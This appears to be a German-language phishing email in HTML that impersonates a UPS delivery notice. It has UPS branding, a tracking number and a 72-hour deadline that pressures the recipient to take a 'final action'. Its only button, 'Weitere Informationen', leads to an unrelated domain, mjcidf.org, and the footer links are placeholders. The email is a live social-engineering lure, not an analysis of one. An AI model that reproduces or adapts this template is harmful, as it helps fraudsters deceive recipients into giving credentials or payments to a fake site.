<!DOCTYPE html>

<html lang="de"><head>
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>UPS – Zustellung Ihrer Sendung</title>
  <style>
    /* RESET & BASE */
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      background-color: #f2f2f2;
      font-family: Arial, Helvetica, sans-serif;
      color: #1f1f1f;
      line-height: 1.5;
      -webkit-font-smoothing: antialiased;
    }

    .container {
      max-width: 600px;
      margin: 30px auto;
      background: #ffffff;
      border-radius: 12px;
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.04);
      overflow: hidden;
    }

    /* HEADER – UPS Brand */
    .header {
      background: #1f1f1f;  /* UPS dark */
      padding: 28px 30px 22px;
      text-align: center;
    }

    .header img {
      width: 82px;
      height: auto;
      display: inline-block;
    }

    /* MAIN CONTENT */
    .main {
      padding: 36px 32px 28px;
    }

    /* TYPOGRAPHY */
    .greeting {
      font-size: 15px;
      color: #333;
      margin-bottom: 6px;
      font-weight: 400;
    }

    .headline {
      font-size: 26px;
      font-weight: 700;
      color: #1f1f1f;
      margin: 8px 0 16px;
      letter-spacing: -0.3px;
    }

    .subhead {
      font-size: 16px;
      color: #444;
      margin-bottom: 12px;
    }

    .tracking-number {
      background: #f7f7f7;
      border-left: 4px solid #ffb500;
      padding: 14px 18px;
      margin: 18px 0 20px;
      font-size: 15px;
      border-radius: 0 6px 6px 0;
      display: inline-block;
      width: auto;
      font-weight: 600;
      letter-spacing: 0.3px;
      color: #1f1f1f;
      box-shadow: inset 0 1px 3px rgba(0,0,0,0.02);
    }

    .tracking-number strong {
      font-weight: 700;
      color: #000;
    }

    .info-text {
      font-size: 15px;
      color: #2c2c2c;
      margin: 14px 0 8px;
    }

    .info-text strong {
      font-weight: 700;
    }

    .deadline-note {
      font-size: 14px;
      color: #555;
      background: #fafafa;
      padding: 12px 16px;
      border-radius: 8px;
      margin: 18px 0 24px;
      border: 1px solid #eee;
    }

    /* BUTTON – UPS yellow */
    .btn {
      display: inline-block;
      background-color: #ffb500;
      color: #1f1f1f;
      font-weight: 700;
      font-size: 16px;
      padding: 14px 36px;
      border-radius: 30px;
      text-decoration: none;
      transition: background 0.15s ease;
      box-shadow: 0 2px 6px rgba(255, 181, 0, 0.3);
      border: 0;
      letter-spacing: 0.2px;
      margin: 8px 0 12px;
    }

    .btn:hover {
      background-color: #f0a800;
      box-shadow: 0 4px 10px rgba(255, 181, 0, 0.35);
    }

    /* DIVIDER */
    .divider {
      margin: 28px 0 18px;
      border-top: 1px solid #eaeaea;
    }

    /* FOOTER */
    .footer {
      background: #fafafa;
      padding: 22px 30px 28px;
      text-align: center;
      border-top: 1px solid #eaeaea;
      font-size: 12px;
      color: #666;
    }

    .footer p {
      margin: 6px 0;
    }

    .footer-links {
      margin-top: 12px;
      display: flex;
      flex-wrap: wrap;
      justify-content: center;
      gap: 6px 14px;
    }

    .footer-links a {
      color: #555;
      text-decoration: underline;
      font-size: 12px;
    }

    .footer-links a:hover {
      color: #1f1f1f;
    }

    .footer .copyright {
      margin-top: 12px;
      font-size: 11px;
      color: #777;
    }

    /* MOBILE */
    @media (max-width: 520px) {
      .main {
        padding: 28px 20px 24px;
      }
      .headline {
        font-size: 22px;
      }
      .btn {
        padding: 13px 28px;
        font-size: 15px;
        width: 100%;
        text-align: center;
      }
      .tracking-number {
        font-size: 14px;
        padding: 12px 14px;
        width: 100%;
        text-align: center;
      }
      .header {
        padding: 22px 16px 18px;
      }
      .header img {
        width: 70px;
      }
    }
  </style>
</head>
<body style="background-color: #f2f2f2;
      font-family: Arial, Helvetica, sans-serif;
      color: #1f1f1f;
      line-height: 1.5;
      -webkit-font-smoothing: antialiased">
  <div style="max-width: 600px;
      margin: 30px auto;
      background: #ffffff;
      border-radius: 12px;
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.04);
      overflow: hidden" class="container">

    <!-- UPS HEADER (dark) -->
    <div class="header">
      <img width="82" height="auto" alt="UPS" src="https://www.ups.com/webassets/icons/logo.svg">
    </div>

    <!-- MAIN CONTENT -->
    <div class="main">
      <p class="greeting">Sehr geehrte Kundin, sehr geehrter Kunde,</p>
      <h1 style="font-size: 26px;
      font-weight: 700;
      color: #1f1f1f;
      margin: 8px 0 16px;
      letter-spacing: -0.3px" class="headline">Ihre Sendung wartet auf die Zustellung</h1>
      <p class="subhead">Für die Zustellung Ihrer Sendung ist eine abschließende Aktion erforderlich.</p>

      <!-- Tracking number (UPS style) -->
      <div style="background: #f7f7f7;
      border-left: 4px solid #ffb500;
      padding: 14px 18px;
      margin: 18px 0 20px;
      font-size: 15px;
      border-radius: 0 6px 6px 0;
      display: inline-block;
      width: auto;
      font-weight: 600;
      letter-spacing: 0.3px;
      color: #1f1f1f;
      box-shadow: inset 0 1px 3px rgba(0,0,0,0.02)" class="tracking-number">
        <strong style="font-weight: 700;
      color: #000">Sendungsnummer:</strong> 1Z430045E02052071688
      </div>

      <p class="info-text">
        Bitte führen Sie die notwendigen Schritte innerhalb von <strong>72 Stunden</strong> aus, um Verzögerungen oder eine Rücksendung zu vermeiden.
      </p>

      <!-- UPS yellow button -->
      <div style="text-align: center; margin-top: 4px;">
        <a class="btn" href="https://mjcidf.org/contact">Weitere Informationen</a>
      </div>

      <!-- subtle note -->
      <div style="font-size: 14px;
      color: #555;
      background: #fafafa;
      padding: 12px 16px;
      border-radius: 8px;
      margin: 18px 0 24px;
      border: 1px solid #eee" class="deadline-note">
        ⏳ Frist: 72 Stunden ab Erhalt dieser Nachricht
      </div>

      <div class="divider"></div>

      <!-- small info (optional) -->
      <p style="text-align: center; color: rgb(90, 90, 90); font-size: 13px; margin-top: 6px;">
        <span style="background: rgb(245, 245, 245); padding: 3px 12px; border-radius: 20px;">Ihre Sendung ist für die Zustellung vorbereitet</span>
      </p>
    </div>

    <!-- FOOTER (UPS style) -->
    <div class="footer">
      <p>© 2026 United Parcel Service of America, Inc.</p>
      <p style="color: rgb(119, 119, 119); font-size: 12px;">Bitte antworten Sie nicht auf diese E-Mail.</p>

      <div style="margin-top: 12px;
      display: flex;
      flex-wrap: wrap;
      justify-content: center;
      gap: 6px 14px" class="footer-links">
        <a style="color: #555;
      text-decoration: underline;
      font-size: 12px" href="#">Datenschutzrichtlinie</a>
        <a style="color: #555;
      text-decoration: underline;
      font-size: 12px" href="#">Allgemeine Geschäftsbedingungen</a>
        <a style="color: #555;
      text-decoration: underline;
      font-size: 12px" href="#">Hilfe und Support</a>
      </div>

      <div class="copyright">
        <span style="margin-top: 6px; display: inline-block; opacity: 0.7;">UPS – vertrauenswürdige Logistik</span>
      </div>
    </div>
  </div>

</body></html>